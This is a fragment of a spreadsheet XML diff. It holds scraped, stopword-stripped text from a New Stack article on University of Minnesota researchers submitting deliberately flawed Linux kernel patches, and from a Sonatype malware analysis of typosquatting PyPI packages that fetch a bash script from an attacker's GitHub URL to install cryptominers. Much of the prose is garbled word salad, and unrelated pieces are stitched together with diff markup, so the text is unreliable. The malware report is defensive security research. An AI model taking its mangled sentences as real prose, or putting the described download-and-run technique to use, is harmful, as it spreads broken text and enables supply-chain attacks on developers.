introduces aipowered search wordpress sites 22nd 744am loraine lawson future websites decline 19th 1148am richard macmanus jetbrains launches cicd tool small midsized teams 18th 100pm loraine lawson news android apps rust astro storybook 16th 400am loraine lawson pythons function iterate without looping 26th 500pm jack wallen python underscore used 26th 802am jack wallen prevent secrets creeping code 25th 613am robert curlee rust community matures jetbrains rustrover 24th 600am david cassel antiagile project tracker linear latest take jira 23rd 500am david eastman news wordpress angular signals components 23rd 400am loraine lawson economics attacks developers stop 12th 803am loraine lawson learn love operations gitopsdriven management 704am emile vauge escape hatches make abstraction powerful 830am siva exploring google’s gemini language model 1024am janakiram pythons function iterate without looping 26th 500pm jack wallen python underscore used 26th 802am jack wallen python classes create 17th 500pm jack wallen python many ways merge dictionary 16th 500pm jack wallen python dont know conditional statements read 15th 500pm jack wallen news wordpress angular signals components 23rd 400am loraine lawson news android apps rust astro storybook 16th 400am loraine lawson free tool helps devs googles complex update 14th 925am loraine lawson build embed components astro qwik stackblitz 500am paul scanlon astros journey static site generator nextjs rival 1100am richard macmanus advanced typescript interfaces abstract classes 22nd 1030am reselman advantages typescript javascript 27th 1051am phil nash news udemys docker program plus typescript beta 501am loraine lawson angular renaissance frontend devs revisit 26th 815am loraine lawson news frontend tool panda updates 16th 400am loraine lawson wasm wins java applets failed 12th 1022am liam crilly adobe developers webassembly improve users’ lives 649am cameron gain wasi unlocking webassembly’s promise outside browser 500am tyler mcmullen luke wagner cheerpj apps browser webassembly 26th 500am cameron gain webassembly browser matures cool things happen 22nd 1228pm cameron gain cloud data migration cloud data tiering 25th 1000am kumar goswami future hybrid edge deployments indispensable 22nd 1000am luis ceze introduce realtime data predictions redpanda 22nd 818am christina software developers thinking climate 21st 122pm charles humble rediscovering devops secure cloud development environments 21st 1000am laurent balmelli pythons function iterate without looping 26th 500pm jack wallen observability observability comes business kpis 26th 1000am eric futoran architect’s guide modern data lake reference architecture 26th 917am keith pijanowski nvidia acceleration supercharged milvus vector database 26th 716am charles isn’t world upgrading databases 25th 128pm richard gall product plans matter 25th 919am charlie klein prevent secrets creeping code 25th 613am robert curlee linux single command across multiple servers 23rd 600am jack wallen rediscovering devops secure cloud development environments 21st 1000am laurent balmelli protect sensitive data prevent practices apache kafka 21st 600am james white platform engineering operations cicd tech careers tech culture devops kubernetes observability service mesh spring java shaped internal developer platforms 26th 110pm charles humble prioritizes measures developer experience 25th 300am jennifer riggins platform mobile engineering work together 22nd 900am usman siddiqui suse upgrades rancher kubernetes management family 20th 750am steven vaughannichols finally platform engineering enterprise cloud migration 13th 300am jennifer riggins linux single command across multiple servers 23rd 600am jack wallen tech cannot comprehend digital nomad life 23rd 300am paul scanlon kubecon24 openshift accelerates delivery 21st 940am steven vaughannichols advent automated observability 20th 1000am ozan unlu saving confidence strategic advantage spot instances 18th 657am leon kuperman evolve manual templated dockerfiles automation 26th 1033am siva platform mobile engineering work together 22nd 900am usman siddiqui building polyglot developer experiences 19th 1014am mauricio salatino nvidia details developing software 19th 824am agam shah elite performance wasted feature factories 19th 600am steve fenton using improve business writing 26th 500am udell developers share helped land roles 25th 645am jeff james tech works identify address burnout team 22nd 500am jennifer riggins tips developers moving sectors software industry 16th 500am david eastman readers worry layoffs salaries 15th 846am lawrence hecht spring java shaped internal developer platforms 26th 110pm charles humble prioritizes measures developer experience 25th 300am jennifer riggins rust community matures jetbrains rustrover 24th 600am david cassel tech works identify address burnout team 22nd 500am jennifer riggins ship culture slow steady wins race 18th 754am paul scanlon prioritizes measures developer experience 25th 300am jennifer riggins antiagile project tracker linear latest take jira 23rd 500am david eastman rediscovering devops secure cloud development environments 21st 1000am laurent balmelli decoding devsecops striking right balance 19th 1000am eitan worcel virtualization containers better together 19th 618am alex handy kubecon24 openshift accelerates delivery 21st 940am steven vaughannichols suse upgrades rancher kubernetes management family 20th 750am steven vaughannichols building polyglot developer experiences 19th 1014am mauricio salatino ovhcloud enables kubernetes cluster management scale 19th 900am meredith shubel virtualization containers better together 19th 618am alex handy observability observability comes business kpis 26th 1000am eric futoran kubecon24 victoriametrics simpler alternative prometheus 20th 114pm joab jackson advent automated observability 20th 1000am ozan unlu framework optimizing observability costs 20th 858am chris cooney kubecon24 minio object store equipped enterprise features 19th 200pm joab jackson linkerd users must fear anger explained 28th 921am cameron gain buoyant revises release model linkerd service mesh 21st 930am joab jackson istio advisor plus expert system meets service mesh 14th 1215pm steven vaughannichols using jwts authenticate services unravels gateways 653am christian posta peter jausovec enhancing kubernetes networking gateway 330am robert kimani university minnesota researchers tried poison linux kernel profile linux tech culture university minnesota researchers tried poison linux kernel researchers university minnesota submitted intentional faulty code linux kernel name research almost away 22nd 209pm jack wallen feature image arek socha pixabay voxpop second poll fast you’re productive when… recent post discussed factors make developers productive code best work interesting lots uninterrupted work time wellsupported good toolset understand entire code base equally productive time opinion love hear think researchers university minnesota submitted intentional faulty code linux kernel almost away name said research paper feasibility stealthily introducing vulnerabilities opensource software hypocrite commits published february goal paper “investigate insecurity open source software critical perspective” approach involved submitting “hypocrite commits” paper’s wording seemingly beneficial commits actually introduced critical issues open source software linux kernel extremely complex patch review process often misses introduced vulnerabilities involve complicated semantics context” prove hypothesis writers paper qiushi kangjie intended commit vulnerable code would turn introduce critical issues kernel measure scientific probability patches accepted software sink moment researchers name academia decided commit flawed code would turn introduce serious issues linux kernel prove could ramifications profound consider linux kernel used fortune companies around world drives enterprise businesses makes possible companies introduce open source technology production pipelines expand capabilities beyond wildest imaginations open source drives innovation business least faulty patch made kernel case missing mutex unlock clearly fortunately kernel maintainer greg kroahhartman caught behavior chastised researchers linux kernel developer’s mailing list group publicly admitted sending knownbuggy patches kernel community would react published paper based work submit series obviously incorrect patches supposed think thing community appreciate experimented “tested” submitting known patches either nothing purpose introduce bugs purpose wish work like suggest find different community experiments welcome actions entire university banned submitting patches linux kernel free open research lies heart open source project walked fine line could serious global repercussions vulnerable patches accepted linux kernel would authors paper come forward inform kernel maintainers they’d done would continue would research also points another troubling factor malicious patches easy surreptitiously slip complex software much done already researchers concluded paper open source projects develop codes conduct forbidding “hypocrite patches” projects robust testing vulnerability discovery tools incoming patches it’s important remember profound lasting effect linux kernel businesses across land responsibility submitting code project taken quite seriously trending stories group created sketch jack wallen happens mindmelds presentday snark jack seeker truth writer words quantum mechanical pencil disjointed beat sound soul although resides read jack wallen share story trending stories linux foundation sponsor stack share story trending stories daily newsletter receive free roundup recent articles inbox subscribe stack sell information share unaffiliated third parties continuing agree terms privacy policy architecture cloud native ecosystem containers edge computing microservices networking serverless storage engineering frontend development software development management python javascript typescript webassembly cloud services data operations platform engineering operations cicd tech careers tech culture devops kubernetes observability service mesh channels podcasts ebooks events newsletter feeds stack contact sponsors sponsorship contributions roadmapsh community created roadmaps articles resources journeys developers help choose path grow career frontend developer roadmap backend developer roadmap devops roadmap stack disclosures terms advertising terms conditions privacy policy cookie policy follow follow daily subscribe</t>
+          <t>Researchers from the University of Minnesota submitted intentionally faulty code to the Linux kernel as part of a research project, and one patch was accepted.</t>
         </is>
       </c>
       <c r="D168" t="inlineStr">
         <is>
           <t>https://thenewstack.io/university-of-minnesota-researchers-tried-to-poison-the-linux-kernel-for-a-research-project/</t>
-        </is>
-      </c>
-      <c r="E168" t="inlineStr">
-        <is>
-          <t>['community', 'software', 'engineering', 'leader', 'aspirational', 'developer', 'intheknow', 'important', 'news', 'exclusive', 'content', 'fresh', 'inbox', 'software', 'development', 'email', 'address', 'subscribe', 'resubscription', 'newsletter', 'button', 'open', 'resubscribe', 'form', 'continue', 'form', 'complete', 'subscription', 'resubscribe', 'stack', 'information', 'share', 'third', 'party', 'agree', 'term', 'privacy', 'policy', 'welcome', 'thank', 'stack', 'community', 'simple', 'question', 'news', 'resource', 'interested', 'first', 'name', 'last', 'name', 'company', 'name', 'country', 'bonaire', 'central', 'island', 'divoire', 'denmark', 'equatorial', 'guinea', 'polynesia', 'french', 'southern', 'territory', 'antille', 'marino', 'tome', 'principe', 'minor', 'outlying', 'island', 'great', 'meet', 'tell', 'cover', 'topic', 'relevant', 'level', 'vpdirector', 'managersupervisor', 'senior', 'nonmanagerial', 'staff', 'entry', 'leveljunior', 'staff', 'freelancercontractor', 'studentintern', 'role', 'select', 'developersoftware', 'engineer', 'sysadminoperationssre', 'architect', 'professional', 'engineerteam', 'community', 'advocate', 'management', 'many', 'employee', 'organization', 'work', 'select', 'working', 'option', 'type', 'organization', 'work', 'select', 'end', 'user', 'organization', 'product', 'service', 'business', 'hardware', 'software', 'vendor', 'supplier', 'cloud', 'service', 'provider', 'service', 'provider', 'system', 'integrator', 'consulting', 'firm', 'good', 'organization', 'primary', 'industry', 'select', 'aerospaceaviation', 'agriculture', 'automotive', 'biotechpharmaceutical', 'business', 'service', 'accounting', 'computersinformation', 'technology', 'construction', 'education', 'facilitiesservice', 'industry', 'financefinancial', 'service', 'banking', 'insurance', 'government', 'healthcare', 'human', 'resource', 'legal', 'life', 'biotech', 'pharmaceutical', 'manufacturing', 'medium', 'nonprofit', 'real', 'estate', 'good', 'telecommunication', 'linkedin', 'profile', 'welcome', 'glad', 'good', 'content', 'news', 'game', 'next', 'check', 'inbox', 'confirmation', 'email', 'preference', 'additional', 'group', 'favorite', 'social', 'medium', 'network', 'follower', 'linkedin', 'trending', 'story', 'first', 'newsletter', 'prev', 'next', 'productive', 'recent', 'post', 'factor', 'developer', 'productive', 'code', 'good', 'interesting', 'lot', 'uninterrupted', 'work', 'time', 'good', 'toolset', 'entire', 'code', 'base', 'productive', 'time', 'thank', 'opinion', 'subscribe', 'final', 'result', 'newsletter', 'search', 'result', 'architecture', 'native', 'ecosystem', 'container', 'computing', 'microservice', 'serverless', 'storage', 'development', 'software', 'development', 'management', 'service', 'data', 'operation', 'platform', 'engineering', 'operation', 'cicd', 'tech', 'career', 'tech', 'culture', 'kubernete', 'observability', 'service', 'mesh', 'channel', 'podcast', 'event', 'newsletter', 'stack', 'contact', 'sponsor', 'sponsorship', 'contribution', 'podcast', 'event', 'newsletter', 'architecture', 'engineering', 'operation', 'cloud', 'native', 'ecosystem', 'container', 'computing', 'microservice', 'serverless', 'delivery', 'simple', 'alternative', 'prometheus', '20th', '114pm', 'journey', 'greener', 'cloud', 'native', 'environment', '20th', 'object', 'store', 'enterprise', '19th', '200pm', 'polyglot', 'developer', '19th', '1014am', 'manual', 'dockerfile', 'automation', '26th', 'virtualization', 'container', '19th', 'join', 'force', 'secure', 'container', '18th', '114pm', 'command', 'line', 'observability', 'developer', 'good', 'friend', 'yigal', 'future', 'hybrid', 'edge', 'deployment', 'indispensable', '22nd', 'kubernete', 'stroke', 'care', '15th', 'humble', 'honey', 'boot', 'edge', 'boot', 'industrial', 'workload', '31st', 'dunith', 'danushka', 'app', 'database', '31st', 'mark', 'evolve', 'manual', 'dockerfile', 'automation', '26th', 'platform', 'engineering', 'work', '22nd', 'framework', 'observability', '20th', 'identity', 'access', 'management', 'event', 'observability', 'multicluster', 'developer', 'good', 'friend', 'yigal', 'observability', 'different', 'web3', 'app', '15th', 'kubernete', 'control', 'plane', '11th', 'connor', 'bpftop', 'application', 'monitor', 'samba', 'network', 'share', 'distribution', 'dbo', 'database', 'alternative', 'message', 'envelope', '31st', 'serverless', 'strategy', 'azure', 'guide', 'modern', 'datum', 'lake', 'reference', 'architecture', '26th', 'pijanowski', 'datum', 'cloud', 'datum', 'object', 'store', 'enterprise', '19th', '200pm', 'guide', 'reference', 'architecture', 'lake', '19th', 'pijanowski', 'reliable', 'storage', 'baremetal', 'capi', 'cluster', '18th', 'development', 'software', 'development', 'management', 'datum', 'vector', 'database', '26th', 'future', 'hybrid', 'edge', 'deployment', 'indispensable', '22nd', 'ceze', 'realtime', 'datum', 'prediction', 'redpanda', '22nd', 'engine', 'search', 'wordpress', 'site', '22nd', 'software', 'developer', 'climate', '21st', 'news', 'wordpress', 'angular', 'signal', 'component', '23rd', 'engine', 'search', 'wordpress', 'site', '22nd', 'future', 'website', '19th', 'tool', 'small', 'midsized', 'team', 'app', 'astro', 'storybook', '16th', 'python', '26th', 'secret', 'code', '25th', 'community', 'mature', 'project', 'tracker', 'late', 'wordpress', 'angular', 'signal', 'component', '23rd', 'developer', 'love', 'operation', 'management', 'emile', 'vauge', 'escape', 'hatch', 'abstraction', 'powerful', 'gemini', 'language', 'model', 'python', '26th', 'class', 'many', 'way', 'conditional', 'statement', 'wordpress', 'angular', 'signal', 'component', '23rd', 'app', 'astro', 'storybook', '16th', 'tool', 'devs', 'google', 'complex', 'update', 'component', 'static', 'site', 'generator', 'typescript', 'interface', 'abstract', 'class', '22nd', 'program', 'angular', 'renaissance', 'devs', 'revisit', '26th', 'frontend', 'tool', 'panda', '16th', 'applet', 'developer', 'user', 'life', 'promise', 'app', 'cool', 'thing', '22nd', '1228pm', 'cloud', 'cloud', 'datum', 'future', 'hybrid', 'edge', 'deployment', 'indispensable', '22nd', 'ceze', 'realtime', 'datum', 'prediction', 'redpanda', '22nd', 'software', 'developer', 'climate', '21st', 'humble', 'devop', 'secure', 'cloud', 'development', 'environment', 'python', '26th', 'observability', 'observability', 'business', 'kpis', 'architect', 'guide', 'modern', 'datum', 'lake', 'reference', 'architecture', '26th', 'vector', 'database', '26th', 'world', 'database', '25th', 'product', 'plan', '25th', 'secret', 'code', '25th', 'multiple', 'server', '23rd', 'secure', 'cloud', 'development', 'environment', 'protect', 'sensitive', 'datum', 'prevent', 'practice', 'engineering', 'operation', 'cicd', 'tech', 'career', 'tech', 'culture', 'kubernete', 'observability', 'service', 'mesh', 'spring', 'internal', 'developer', 'platform', 'measure', 'developer', 'experience', '25th', 'mobile', 'engineering', 'work', '22nd', 'upgrade', 'rancher', 'family', 'platform', 'engineering', 'enterprise', 'cloud', 'migration', '13th', 'command', 'multiple', 'server', '23rd', 'digital', 'life', 'delivery', 'advent', 'observability', '20th', '1000am', 'confidence', 'strategic', 'advantage', 'spot', 'instance', '18th', 'manual', 'dockerfile', 'automation', '26th', 'platform', 'engineering', 'work', '22nd', 'polyglot', 'developer', '19th', '1014am', 'detail', 'software', '19th', '824am', 'agam', 'shah', 'elite', 'performance', 'feature', 'factory', '19th', 'business', '26th', 'udell', 'developer', 'land', 'role', '25th', 'address', 'burnout', 'team', '22nd', 'developer', 'sector', 'software', 'industry', '16th', 'reader', 'layoff', 'salary', '15th', 'internal', 'developer', 'platform', 'measure', 'developer', 'experience', '25th', 'community', 'mature', 'work', 'address', 'burnout', 'team', '22nd', 'ship', 'culture', 'steady', 'win', 'race', '18th', 'measure', 'developer', 'experience', '25th', 'project', 'tracker', 'late', 'secure', 'cloud', 'development', 'environment', 'devsecop', 'right', 'balance', 'virtualization', 'container', '19th', 'delivery', 'upgrade', 'rancher', 'family', 'polyglot', 'developer', '19th', '1014am', 'cluster', 'management', 'scale', 'virtualization', 'container', '19th', 'handy', 'observability', 'observability', 'business', 'kpis', 'simple', 'alternative', 'prometheus', '20th', '114pm', 'observability', '20th', '1000am', 'framework', 'observability', '20th', 'object', 'store', 'enterprise', '19th', '200pm', 'user', 'anger', '28th', 'buoyant', 'revise', 'release', 'model', 'expert', 'system', 'service', 'mesh', '14th', 'service', 'researcher', 'researcher', 'intentional', 'faulty', 'code', 'research', '22nd', 'image', 'productive', 'recent', 'post', 'factor', 'developer', 'productive', 'code', 'good', 'interesting', 'lot', 'uninterrupted', 'work', 'time', 'good', 'toolset', 'entire', 'code', 'base', 'productive', 'time', 'opinion', 'love', 'researcher', 'intentional', 'faulty', 'code', 'name', 'research', 'paper', 'feasibility', 'vulnerability', 'opensource', 'software', 'hypocrite', 'goal', 'paper', 'insecurity', 'open', 'source', 'software', 'critical', 'perspective', 'approach', 'hypocrite', 'paper', 'wording', 'beneficial', 'commit', 'critical', 'issue', 'open', 'source', 'software', 'complex', 'patch', 'review', 'process', 'vulnerability', 'complicated', 'semantic', 'context', 'hypothesis', 'writer', 'paper', 'vulnerable', 'code', 'critical', 'issue', 'scientific', 'probability', 'patch', 'software', 'sink', 'moment', 'researcher', 'academia', 'commit', 'flawed', 'code', 'serious', 'issue', 'ramification', 'profound', 'fortune', 'company', 'world', 'enterprise', 'business', 'possible', 'company', 'open', 'source', 'technology', 'production', 'pipeline', 'capability', 'wild', 'imagination', 'open', 'source', 'innovation', 'business', 'faulty', 'patch', 'kernel', 'case', 'mutex', 'unlock', 'behavior', 'researcher', 'mailing', 'list', 'group', 'patch', 'community', 'paper', 'work', 'series', 'incorrect', 'patch', 'thing', 'community', 'patch', 'purpose', 'bug', 'purpose', 'wish', 'work', 'different', 'community', 'experiment', 'welcome', 'action', 'entire', 'university', 'patch', 'open', 'research', 'heart', 'open', 'source', 'project', 'fine', 'line', 'serious', 'global', 'repercussion', 'vulnerable', 'patch', 'author', 'paper', 'kernel', 'troubling', 'factor', 'malicious', 'patch', 'complex', 'software', 'researcher', 'paper', 'open', 'source', 'project', 'code', 'hypocrite', 'patch', 'robust', 'testing', 'vulnerability', 'discovery', 'tool', 'incoming', 'patch', 'important', 'profound', 'lasting', 'effect', 'business', 'land', 'responsibility', 'code', 'project', 'story', 'group', 'sketch', 'mindmeld', 'presentday', 'truth', 'writer', 'mechanical', 'pencil', 'sound', 'soul', 'story', 'story', 'sponsor', 'stack', 'share', 'story', 'story', 'daily', 'newsletter', 'free', 'roundup', 'recent', 'article', 'inbox', 'subscribe', 'stack', 'information', 'share', 'third', 'party', 'agree', 'term', 'privacy', 'policy', 'architecture', 'cloud', 'native', 'ecosystem', 'container', 'computing', 'microservice', 'serverless', 'storage', 'development', 'software', 'development', 'management', 'service', 'data', 'operation', 'platform', 'engineering', 'operation', 'cicd', 'tech', 'career', 'tech', 'culture', 'kubernete', 'observability', 'service', 'mesh', 'channel', 'podcast', 'event', 'newsletter', 'stack', 'contact', 'sponsor', 'sponsorship', 'contribution', 'roadmapsh', 'community', 'roadmap', 'article', 'resource', 'journey', 'developer', 'path', 'career', 'frontend', 'developer', 'roadmap', 'backend', 'developer', 'roadmap', 'roadmap', 'stack', 'disclosure', 'term', 'advertising', 'term', 'condition', 'privacy', 'policy', 'cookie', 'policy', 'follow', 'follow', 'daily', 'subscribe']</t>
         </is>
       </c>
     </row>
@@ -4831,17 +4161,12 @@
       </c>
       <c r="C169" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo sonatype catches pypi cryptomining malware june sharma minute read time share sonatype identified malicious typosquatting packages infiltrating pypi repository secretly pull cryptominers affected machines pypi packages listed together scoring almost downloads maratlib maratlib1 matplatlibplus mllearnlib mplatlib learninglib posted author nedog123 pypi early april year counterfeit components discovered sonatypes automated malware detection system release integrity part nextgen sonatype intelligence engine analysis tools consistently catching blocking counterfeit malicious software components strike modern software supply chains fact since launching release integrity identified suspicious open source packages many made headlines time time weve historically focused ecosystem colleague data scientist cody nash nudged weekend components explaining packages came exploring ecosystems developing release integrity malware detection capabilities observed sonatype open source ecosystems like nash believes trend malicious packages infiltrating pypi expects keep growing graph post explain whats inside packages primary focus analysis maratlib malicious components simply pull dependency example case aforementioned learninglib image “maratlib” dependency “learninglib” package also packages typosquats programs expected grabbed people accidentally typing wrong name example counterfeit mplatlib matplatlibplus named legitimate python plotting software matplotlib mplatlib pulls malicious maratlib dependency image dependency referred ‘lkek’ “maratlib” packages malicious code contained setuppy file build script runs packages installation sonatype customers tracking malicious typosquats sonatype20210722 began analyzing first looked maratlib latest version image “maratlib” contains heavily obfuscated code version maratlib heavily obfuscated attempted connect github wasnt clear initially looking deobfuscating code using popular tools didn’t help much initially left frustrated observing dynamic behavior looking around clues prior versions maratlib helped solve puzzle looking version found little obfuscated code seeing instead code essentially downloads runs bash script github image highlighted code serving bash script httpsgithubcomnedog123filesrawmain azash throws found error every version package bash script hosted github sometimes called seosh azash aza2sh azaobfsh among variations none urls worked kept digging began tracing malware author’s alias nedog123 github archives mirrors around shortly thereafter clues emerged author previously used aliases nedog123 marat nedogimov appears switched maratoff scripts found moreover commit associated updatedeletion scripts found github mirrors mentioned alias nedog123 matched commits maratoffs repository image contents “aza2sh” bash script pulled versions “maratlib” also newer maratoff repo contains files referencing deleted nedog123 alias bash scripts cryptominers compromised machines evident image socalled aza2sh bash script pulled malicious pypi package downloads cryptominer called ubqminer bash script malware author already changed default kryptex wallet address ending c0124 0x510aec7f266557b7de753231820571b13eb31b57 transaction history also upon digging deeper contents nowdeleted azash file emerged image contents nowdeleted azash script archived commit script uses different open source cryptomining program called trex although point also deployed previously mentioned ubqminer fact interested there’s whole history commits azash aza2sh since release packages scored following total number downloads date according pepy maratlib maratlib1 matplatlibplus mllearnlib mplatlib learninglib adding almost downloads sonatype publishing findings catching malicious packages weekend notifying pypi packages evolving open source supply chain attacks warrant advanced protection particular discovery indication developers target adversaries software write sonatype tracing novel brandjacking cryptomining typosquatting malware lurking software repositories weve also found critical vulnerabilities nextgen supplychain attacks well copycat packages targeting wellknown tech companies pypi packages lurking repository months targeting developer systems goal turning cryptominers good news past weeks release integritys experimental runs managed catch pypi packages components either confirmed malicious previously known malicious dependency confusion copycats image malicious pypi package versions month expanding malware detection capabilities sonatype intelligence ecosystems well takes diligence luck takes expertise experienced professionals hundreds terabytes data order keep pace malware mutations sonatype analyses every newly released package keep developers safe help remain proactive safeguard software supply chains upandcoming attacks aimlpowered automated malware detection system release integrity research team work together fullspectrum protection release integrity determines likely malicious component based historical supply chain attacks fivedozen signals insight enables flagging potential attacks researchers discover soon release integrity flags package dependency suspicious undergoes quarantine queue manual review sonatype research team meanwhile users sonatype repository firewall protected suspicious packages review underway existing components quarantined pulled downstream developers open source build environment moreover users enabled dependency confusion policy feature proactive protection dependency confusion attacks works whether conflicting package names exist public repository private internal repos sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections tags vulnerabilities featured written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Sonatype has identified malicious typosquatting packages infiltrating the PyPI repository that secretly pull in cryptominers on the affected machines.</t>
         </is>
       </c>
       <c r="D169" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection</t>
-        </is>
-      </c>
-      <c r="E169" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'sonatype', 'time', 'share', 'sonatype', 'malicious', 'typosquatting', 'package', 'repository', 'cryptominer', 'machine', 'author', 'nedog123', 'early', 'year', 'counterfeit', 'component', 'sonatype', 'malware', 'detection', 'system', 'integrity', 'part', 'sonatype', 'intelligence', 'engine', 'analysis', 'tool', 'counterfeit', 'malicious', 'software', 'component', 'modern', 'software', 'supply', 'chain', 'fact', 'release', 'integrity', 'suspicious', 'open', 'source', 'package', 'many', 'headline', 'time', 'time', 'ecosystem', 'colleague', 'scientist', 'weekend', 'component', 'package', 'ecosystem', 'release', 'integrity', 'malware', 'detection', 'capability', 'sonatype', 'open', 'source', 'ecosystem', 'trend', 'malicious', 'package', 'pypi', 'graph', 'post', 'inside', 'package', 'primary', 'focus', 'analysis', 'malicious', 'component', 'dependency', 'example', 'case', 'dependency', 'package', 'typosquat', 'program', 'people', 'wrong', 'name', 'example', 'counterfeit', 'matplatlibplus', 'legitimate', 'python', 'plotting', 'software', 'malicious', 'image', 'dependency', 'malicious', 'code', 'setuppy', 'file', 'build', 'script', 'package', 'installation', 'sonatype', 'customer', 'malicious', 'typosquat', 'late', 'version', 'image', 'code', 'version', 'connect', 'code', 'popular', 'tool', 'frustrated', 'dynamic', 'behavior', 'clue', 'version', 'puzzle', 'version', 'little', 'code', 'seeing', 'code', 'run', 'bash', 'script', 'code', 'bash', 'script', 'httpsgithubcomnedog123filesrawmain', 'azash', 'throw', 'error', 'version', 'package', 'bash', 'script', 'azash', 'aza2sh', 'azaobfsh', 'variation', 'none', 'url', 'malware', 'author', 'alias', 'archive', 'mirror', 'clue', 'author', 'alias', 'maratoff', 'script', 'updatedeletion', 'script', 'mirror', 'alias', 'nedog123', 'commit', 'maratoff', 'repository', 'image', 'content', 'bash', 'script', 'version', 'new', 'file', 'nedog123', 'alias', 'bash', 'script', 'cryptominer', 'machine', 'evident', 'image', 'bash', 'script', 'malicious', 'pypi', 'package', 'cryptominer', 'author', 'default', 'kryptex', 'wallet', 'address', '0x510aec7f266557b7de753231820571b13eb31b57', 'transaction', 'history', 'deep', 'content', 'azash', 'file', 'image', 'content', 'azash', 'commit', 'script', 'different', 'open', 'source', 'program', 'point', 'fact', 'interested', 'whole', 'history', 'azash', 'release', 'package', 'total', 'number', 'date', 'download', 'publishing', 'finding', 'malicious', 'package', 'weekend', 'package', 'open', 'source', 'supply', 'chain', 'attack', 'advanced', 'protection', 'particular', 'discovery', 'indication', 'developer', 'adversary', 'software', 'write', 'sonatype', 'novel', 'cryptomining', 'malware', 'software', 'repository', 'critical', 'vulnerability', 'attack', 'copycat', 'package', 'wellknown', 'tech', 'company', 'package', 'repository', 'month', 'developer', 'system', 'goal', 'cryptominer', 'good', 'news', 'past', 'week', 'release', 'experimental', 'run', 'catch', 'package', 'component', 'malicious', 'malicious', 'dependency', 'confusion', 'copycat', 'malicious', 'pypi', 'package', 'version', 'month', 'malware', 'detection', 'capability', 'intelligence', 'ecosystem', 'diligence', 'luck', 'expertise', 'professional', 'hundred', 'terabyte', 'datum', 'order', 'pace', 'malware', 'mutation', 'analysis', 'package', 'developer', 'safe', 'help', 'proactive', 'safeguard', 'software', 'supply', 'chain', 'attack', 'detection', 'system', 'release', 'integrity', 'research', 'team', 'fullspectrum', 'protection', 'release', 'integrity', 'likely', 'malicious', 'component', 'historical', 'supply', 'chain', 'attack', 'fivedozen', 'signal', 'insight', 'potential', 'attack', 'researcher', 'integrity', 'flag', 'package', 'dependency', 'suspicious', 'quarantine', 'queue', 'manual', 'review', 'sonatype', 'research', 'team', 'user', 'repository', 'firewall', 'suspicious', 'package', 'underway', 'component', 'downstream', 'developer', 'open', 'source', 'build', 'environment', 'user', 'dependency', 'confusion', 'policy', 'feature', 'proactive', 'protection', 'dependency', 'confusion', 'attack', 'package', 'name', 'public', 'repository', 'private', 'internal', 'repos', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'tag', 'vulnerability', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 